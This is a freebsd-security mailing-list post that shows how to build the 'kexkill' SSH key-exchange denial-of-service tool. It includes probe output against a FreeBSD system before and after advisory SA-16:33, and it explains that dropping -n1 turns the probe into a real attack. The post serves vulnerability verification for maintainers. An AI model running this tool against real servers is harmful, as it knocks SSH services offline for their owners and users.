Xin LI <delp...@gmail.com> writes:
> We will investigate if the statement is true and will issue patches
> for earlier FreeBSD releases, if they are confirmed to be affected.

Hoping to make your life a little easier:

$ git clone https://github.com/dag-erling/kexkill
$ cd kexkill
$ ./autogen.sh && ./configure && make

vulnerable 12.0 system:

$ ./src/kexkill -v -n1 target |& grep -v "sending kexinit"
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
[no more output]
^C

same system after applying SA-16:33:

$ ./src/kexkill -v -n1 target |& grep -v "sending kexinit"
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] read(): Connection reset by peer
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] write(): Broken pipe
kexkill: [03] connected
kexkill: [03] got banner: SSH-2.0-OpenSSH_7.2 FreeBSD-20160310
kexkill: [03] sending banner
kexkill: [03] received kexinit
kexkill: [03] read(): Connection reset by peer
[...]
^C

Remove -n1 to actually (attempt to) attack the system rather than just
probe it.

DES
-- 
Dag-Erling Smørgrav - d...@des.no
_______________________________________________
freebsd-security@freebsd.org mailing list
https://lists.freebsd.org/mailman/listinfo/freebsd-security
To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"

Reply via email to